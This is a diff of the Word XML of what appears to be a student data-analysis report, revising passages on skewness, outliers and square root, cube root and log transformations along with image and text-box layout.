+                        <w:br/>
+                      </w:r>
+                      <w:r>
                         <w:rPr>
                           <w:noProof/>
                         </w:rPr>
                         <w:drawing>
-                          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="60B3B3C9" wp14:editId="319D97DD">
-                            <wp:extent cx="2402541" cy="3074564"/>
-                            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-                            <wp:docPr id="1685088419" name="Picture 1" descr="A screenshot of a data&#10;&#10;Description automatically generated"/>
+                          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="14FCE9DE" wp14:editId="68DAF72A">
+                            <wp:extent cx="2548034" cy="909637"/>
+                            <wp:effectExtent l="0" t="0" r="5080" b="5080"/>
+                            <wp:docPr id="47217360" name="Picture 1" descr="A screenshot of a computer code&#10;&#10;Description automatically generated"/>
                             <wp:cNvGraphicFramePr>
                               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
                             </wp:cNvGraphicFramePr>
@@ -11856,11 +11578,11 @@
                               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                                   <pic:nvPicPr>
-                                    <pic:cNvPr id="1685088419" name="Picture 1" descr="A screenshot of a data&#10;&#10;Description automatically generated"/>
+                                    <pic:cNvPr id="47217360" name="Picture 1" descr="A screenshot of a computer code&#10;&#10;Description automatically generated"/>
                                     <pic:cNvPicPr/>
                                   </pic:nvPicPr>
                                   <pic:blipFill>
-                                    <a:blip r:embed="rId27"/>
+                                    <a:blip r:embed="rId28"/>
                                     <a:stretch>
                                       <a:fillRect/>
                                     </a:stretch>
@@ -11868,7 +11590,7 @@
                                   <pic:spPr>
                                     <a:xfrm>
                                       <a:off x="0" y="0"/>
-                                      <a:ext cx="2407230" cy="3080565"/>
+                                      <a:ext cx="2590814" cy="924909"/>
                                     </a:xfrm>
                                     <a:prstGeom prst="rect">
                                       <a:avLst/>
@@ -11881,31 +11603,44 @@
                         </w:drawing>
                       </w:r>
                     </w:p>
+                    <w:p>
+                      <w:pPr>
+                        <w:pStyle w:val="BodyA"/>
+                      </w:pPr>
+                    </w:p>
                   </w:txbxContent>
                 </v:textbox>
-                <w10:wrap type="topAndBottom" anchorx="margin"/>
+                <w10:wrap type="square" anchorx="margin"/>
               </v:shape>
             </w:pict>
           </mc:Fallback>
         </mc:AlternateContent>
       </w:r>
       <w:r>
-        <w:t>For skewness, a</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">s we have more columns, I've implemented a </w:t>
-      </w:r>
-      <w:r>
-        <w:t>“F</w:t>
-      </w:r>
-      <w:r>
-        <w:t>or</w:t>
-      </w:r>
-      <w:r>
-        <w:t>”</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> loop to identify and print the skewness only when it exceeds the threshold.</w:t>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Skewness vs outliers:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+      </w:pPr>
+      <w:r>
+        <w:t>As a result, we have 4 skewed columns, with some right skewness and others left skewness. Also, we can observe that there are 5 rows with outliers.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>Considering that the dataframe contains 20 rows, removing outliers would eliminate 5 rows. In this scenario, the preferred approach is to transform the data to mitigate skewness rather than removing outliers.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11931,65 +11666,98 @@
       <w:pPr>
         <w:pStyle w:val="BodyA"/>
       </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">For right skewness, I’ve </w:t>
+      </w:r>
+      <w:r>
+        <w:t>applied</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> the following transformation methods:</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="BodyA"/>
       </w:pPr>
+      <w:r>
+        <w:t>Square Root</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Transformation</w:t>
+      </w:r>
+      <w:r>
+        <w:t>:</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="BodyA"/>
       </w:pPr>
       <w:r>
+        <w:t>Square root transformation is suitable for right-skewed (positively skewed) data</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">it has better performance in </w:t>
+      </w:r>
+      <w:r>
+        <w:t>mildly right-skewed</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t xml:space="preserve">For right skewness, I’ve </w:t>
-      </w:r>
-      <w:r>
-        <w:t>applied</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> the following transformation methods:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Square Root</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> Transformation</w:t>
-      </w:r>
-      <w:r>
-        <w:t>:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Square root transformation is suitable for right-skewed (positively skewed) data</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">it has better performance in </w:t>
-      </w:r>
-      <w:r>
-        <w:t>mildly right-skewed</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-      </w:pPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="218733AC" wp14:editId="2E3B78D9">
+            <wp:extent cx="2231388" cy="881063"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1409856440" name="Picture 1" descr="A screenshot of a cell phone&#10;&#10;Description automatically generated"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1409856440" name="Picture 1" descr="A screenshot of a cell phone&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId29"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="2249211" cy="888101"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:noProof/>
@@ -11997,16 +11765,16 @@
         <mc:AlternateContent>
           <mc:Choice Requires="wps">
             <w:drawing>
-              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251671552" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="148B07A8" wp14:editId="28DA0D72">
+              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251671552" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="148B07A8" wp14:editId="1C6DF869">
                 <wp:simplePos x="0" y="0"/>
                 <wp:positionH relativeFrom="column">
-                  <wp:posOffset>2426335</wp:posOffset>
+                  <wp:posOffset>2427605</wp:posOffset>
                 </wp:positionH>
                 <wp:positionV relativeFrom="paragraph">
-                  <wp:posOffset>203200</wp:posOffset>
+                  <wp:posOffset>-635</wp:posOffset>
                 </wp:positionV>
-                <wp:extent cx="2550160" cy="1483360"/>
-                <wp:effectExtent l="0" t="0" r="21590" b="21590"/>
+                <wp:extent cx="3404870" cy="986155"/>
+                <wp:effectExtent l="0" t="0" r="24130" b="23495"/>
                 <wp:wrapSquare wrapText="bothSides"/>
                 <wp:docPr id="1143755912" name="Text Box 2"/>
                 <wp:cNvGraphicFramePr>
@@ -12021,7 +11789,7 @@
                       <wps:spPr bwMode="auto">
                         <a:xfrm>
                           <a:off x="0" y="0"/>
-                          <a:ext cx="2550160" cy="1483360"/>
+                          <a:ext cx="3404870" cy="986155"/>
                         </a:xfrm>
                         <a:prstGeom prst="rect">
                           <a:avLst/>
@@ -12060,7 +11828,31 @@
                               <w:rPr>
                                 <w:lang w:val="en-US"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">As the result, some columns with mild skewness where adjusted, but the columns with </w:t>
+                              <w:t xml:space="preserve">As the result, </w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:lang w:val="en-US"/>
+                              </w:rPr>
+                              <w:t>them</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:lang w:val="en-US"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve"> column with mild skewness </w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:lang w:val="en-US"/>
+                              </w:rPr>
+                              <w:t>was</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:lang w:val="en-US"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve"> adjusted, but the columns with </w:t>
                             </w:r>
                             <w:r>
                               <w:rPr>
@@ -12078,7 +11870,13 @@
                               <w:rPr>
                                 <w:lang w:val="en-US"/>
                               </w:rPr>
-                              <w:t xml:space="preserve">were </w:t>
+                              <w:t>was</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:rPr>
+                                <w:lang w:val="en-US"/>
+                              </w:rPr>
+                              <w:t xml:space="preserve"> </w:t>
                             </w:r>
                             <w:r>
                               <w:rPr>
@@ -12106,7 +11904,7 @@
           </mc:Choice>
           <mc:Fallback>
             <w:pict>
-              <v:shape w14:anchorId="148B07A8" id="_x0000_s1031" type="#_x0000_t202" style="position:absolute;margin-left:191.05pt;margin-top:16pt;width:200.8pt;height:116.8pt;z-index:251671552;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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">
+              <v:shape w14:anchorId="148B07A8" id="_x0000_s1031" type="#_x0000_t202" style="position:absolute;margin-left:191.15pt;margin-top:-.05pt;width:268.1pt;height:77.65pt;z-index:251671552;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:absolute;mso-position-horizontal-relative:text;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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">
                 <v:textbox>
                   <w:txbxContent>
                     <w:p>
@@ -12129,7 +11927,31 @@
                         <w:rPr>
                           <w:lang w:val="en-US"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">As the result, some columns with mild skewness where adjusted, but the columns with </w:t>
+                        <w:t xml:space="preserve">As the result, </w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:lang w:val="en-US"/>
+                        </w:rPr>
+                        <w:t>them</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:lang w:val="en-US"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve"> column with mild skewness </w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:lang w:val="en-US"/>
+                        </w:rPr>
+                        <w:t>was</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:lang w:val="en-US"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve"> adjusted, but the columns with </w:t>
                       </w:r>
                       <w:r>
                         <w:rPr>
@@ -12147,7 +11969,13 @@
                         <w:rPr>
                           <w:lang w:val="en-US"/>
                         </w:rPr>
-                        <w:t xml:space="preserve">were </w:t>
+                        <w:t>was</w:t>
+                      </w:r>
+                      <w:r>
+                        <w:rPr>
+                          <w:lang w:val="en-US"/>
+                        </w:rPr>
+                        <w:t xml:space="preserve"> </w:t>
                       </w:r>
                       <w:r>
                         <w:rPr>
@@ -12168,56 +11996,29 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D86FF0E" wp14:editId="5EF37A0D">
-            <wp:extent cx="2227580" cy="1768548"/>
-            <wp:effectExtent l="0" t="0" r="1270" b="3175"/>
-            <wp:docPr id="157292078" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="157292078" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId28"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="2227580" cy="1768548"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="BodyA"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
         <w:rPr>
           <w:noProof/>
         </w:rPr>
       </w:pPr>
-      <w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
@@ -12242,10 +12043,7 @@
         <w:pStyle w:val="BodyA"/>
       </w:pPr>
       <w:r>
-        <w:t>C</w:t>
-      </w:r>
-      <w:r>
-        <w:t>ube rooting can help reduce the influence of extreme values or outliers in the data, making the data more robust to the presence of outliers.</w:t>
+        <w:t>Cube rooting can help reduce the influence of extreme values or outliers in the data, making the data more robust to the presence of outliers.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12259,16 +12057,16 @@
         <mc:AlternateContent>
           <mc:Choice Requires="wps">
             <w:drawing>
-              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251673600" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="50B758E6" wp14:editId="59C1E8EA">
+              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251673600" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="50B758E6" wp14:editId="08916FAE">
                 <wp:simplePos x="0" y="0"/>
                 <wp:positionH relativeFrom="margin">
-                  <wp:posOffset>205740</wp:posOffset>
+                  <wp:posOffset>120015</wp:posOffset>
                 </wp:positionH>
                 <wp:positionV relativeFrom="paragraph">
-                  <wp:posOffset>233680</wp:posOffset>
+                  <wp:posOffset>239713</wp:posOffset>
                 </wp:positionV>
-                <wp:extent cx="2550160" cy="1483360"/>
-                <wp:effectExtent l="0" t="0" r="21590" b="21590"/>
+                <wp:extent cx="3180080" cy="1106805"/>
+                <wp:effectExtent l="0" t="0" r="20320" b="17145"/>
                 <wp:wrapSquare wrapText="bothSides"/>
                 <wp:docPr id="1707593090" name="Text Box 2"/>
                 <wp:cNvGraphicFramePr>
@@ -12283,7 +12081,7 @@
                       <wps:spPr bwMode="auto">
                         <a:xfrm>
                           <a:off x="0" y="0"/>
-                          <a:ext cx="2550160" cy="1483360"/>
+                          <a:ext cx="3180080" cy="1106805"/>
                         </a:xfrm>
                         <a:prstGeom prst="rect">
                           <a:avLst/>
@@ -12310,7 +12108,7 @@
                               </w:rPr>
                             </w:pPr>
                             <w:r>
-                              <w:t>After the cube root transformation, the outcome was as follows: The cube root proved to be more effective than the square root in reducing skewness, but it was still not sufficient to fully adjust the highly skewed columns.</w:t>
+                              <w:t>After the cube root transformation, the outcome was as follows: The cube root proved to be more effective than the square root in reducing skewness, but it was still not sufficient to fully adjust the highly skewed column.</w:t>
                             </w:r>
                           </w:p>
                         </w:txbxContent>
@@ -12332,7 +12130,7 @@
           </mc:Choice>
           <mc:Fallback>
             <w:pict>
-              <v:shape w14:anchorId="50B758E6" id="_x0000_s1032" type="#_x0000_t202" style="position:absolute;margin-left:16.2pt;margin-top:18.4pt;width:200.8pt;height:116.8pt;z-index:251673600;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:absolute;mso-position-horizontal-relative:margin;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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">
+              <v:shape w14:anchorId="50B758E6" id="_x0000_s1032" type="#_x0000_t202" style="position:absolute;margin-left:9.45pt;margin-top:18.9pt;width:250.4pt;height:87.15pt;z-index:251673600;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:absolute;mso-position-horizontal-relative:margin;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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">
                 <v:textbox>
                   <w:txbxContent>
                     <w:p>
@@ -12343,7 +12141,7 @@
                         </w:rPr>
                       </w:pPr>
                       <w:r>
-                        <w:t>After the cube root transformation, the outcome was as follows: The cube root proved to be more effective than the square root in reducing skewness, but it was still not sufficient to fully adjust the highly skewed columns.</w:t>
+                        <w:t>After the cube root transformation, the outcome was as follows: The cube root proved to be more effective than the square root in reducing skewness, but it was still not sufficient to fully adjust the highly skewed column.</w:t>
                       </w:r>
                     </w:p>
                   </w:txbxContent>
@@ -12357,15 +12155,20 @@
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:noProof/>
         </w:rPr>
         <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19616ABE" wp14:editId="01FFE222">
-            <wp:extent cx="2748587" cy="1817914"/>
-            <wp:effectExtent l="0" t="0" r="0" b="0"/>
-            <wp:docPr id="2103227017" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26FE8221" wp14:editId="3FB640FB">
+            <wp:extent cx="2439902" cy="950278"/>
+            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
+            <wp:docPr id="757361262" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -12373,11 +12176,11 @@
               <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                 <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                   <pic:nvPicPr>
-                    <pic:cNvPr id="2103227017" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
+                    <pic:cNvPr id="757361262" name="Picture 1" descr="A screenshot of a computer&#10;&#10;Description automatically generated"/>
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId29"/>
+                    <a:blip r:embed="rId30"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -12385,7 +12188,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="2761583" cy="1826510"/>
+                      <a:ext cx="2457480" cy="957124"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -12400,15 +12203,12 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:b/>
@@ -12417,8 +12217,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
-        <w:t>Reciprocal Transformation</w:t>
-      </w:r>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -12428,7 +12227,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
-        <w:t>:</w:t>
+        <w:t>Log Transformation:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12436,29 +12235,28 @@
         <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
       </w:pPr>
       <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        <w:t>Log transformation is a common way to handle right-skewed data</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> It can be used to improve the normality of the data, which is a requirement for </w:t>
+      </w:r>
+      <w:r>
+        <w:t>regression models.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t>R</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="en-IE"/>
-        </w:rPr>
-        <w:t>eciprocal transformation is effective in reducing the impact of outliers, especially for data with right-skewness.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="NormalWeb"/>
-        <w:rPr>
-          <w:noProof/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -12468,18 +12266,18 @@
         <mc:AlternateContent>
           <mc:Choice Requires="wps">
             <w:drawing>
-              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251675648" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="446A87AD" wp14:editId="5C15B431">
+              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251681792" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="75868D58" wp14:editId="7F16F9AA">
                 <wp:simplePos x="0" y="0"/>
                 <wp:positionH relativeFrom="margin">
-                  <wp:posOffset>3312459</wp:posOffset>
+                  <wp:posOffset>3265805</wp:posOffset>
                 </wp:positionH>
                 <wp:positionV relativeFrom="paragraph">
-                  <wp:posOffset>214742</wp:posOffset>
+                  <wp:posOffset>3175</wp:posOffset>
                 </wp:positionV>
-                <wp:extent cx="2550160" cy="1483360"/>
-                <wp:effectExtent l="0" t="0" r="21590" b="21590"/>
+                <wp:extent cx="2838450" cy="990600"/>
+                <wp:effectExtent l="0" t="0" r="19050" b="19050"/>
                 <wp:wrapSquare wrapText="bothSides"/>
-                <wp:docPr id="1828869735" name="Text Box 2"/>
+                <wp:docPr id="354028084" name="Text Box 2"/>
                 <wp:cNvGraphicFramePr>
                   <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"/>
                 </wp:cNvGraphicFramePr>
@@ -12492,7 +12290,7 @@
                       <wps:spPr bwMode="auto">
                         <a:xfrm>
                           <a:off x="0" y="0"/>
-                          <a:ext cx="2550160" cy="1483360"/>
+                          <a:ext cx="2838450" cy="990600"/>
                         </a:xfrm>
                         <a:prstGeom prst="rect">
                           <a:avLst/>
@@ -12519,7 +12317,16 @@
                               </w:rPr>
                             </w:pPr>
                             <w:r>
-                              <w:t>After the cube root transformation, the outcome was as follows: The cube root proved to be more effective than the square root in reducing skewness, but it was still not sufficient to fully adjust the highly skewed columns.</w:t>
+                              <w:t xml:space="preserve">Log transformation </w:t>
+                            </w:r>
+                            <w:r>
+                              <w:t>proved to be more effective than the square root</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:t xml:space="preserve"> and cube root</w:t>
+                            </w:r>
+                            <w:r>
+                              <w:t xml:space="preserve"> in reducing skewness, but it was still not sufficient to fully adjust the highly skewed column.</w:t>
                             </w:r>
                           </w:p>
                         </w:txbxContent>
@@ -12541,7 +12348,7 @@
           </mc:Choice>
           <mc:Fallback>
             <w:pict>
-              <v:shape w14:anchorId="446A87AD" id="_x0000_s1033" type="#_x0000_t202" style="position:absolute;margin-left:260.8pt;margin-top:16.9pt;width:200.8pt;height:116.8pt;z-index:251675648;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:absolute;mso-position-horizontal-relative:margin;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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">
+              <v:shape w14:anchorId="75868D58" id="_x0000_s1033" type="#_x0000_t202" style="position:absolute;margin-left:257.15pt;margin-top:.25pt;width:223.5pt;height:78pt;z-index:251681792;visibility:visible;mso-wrap-style:square;mso-width-percent:0;mso-height-percent:0;mso-wrap-distance-left:9pt;mso-wrap-distance-top:3.6pt;mso-wrap-distance-right:9pt;mso-wrap-distance-bottom:3.6pt;mso-position-horizontal:absolute;mso-position-horizontal-relative:margin;mso-position-vertical:absolute;mso-position-vertical-relative:text;mso-width-percent:0;mso-height-percent:0;mso-width-relative:margin;mso-height-relative:margin;v-text-anchor:top" o:gfxdata="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">
                 <v:textbox>
                   <w:txbxContent>
                     <w:p>
@@ -12552,7 +12359,16 @@
                         </w:rPr>
                       </w:pPr>
                       <w:r>
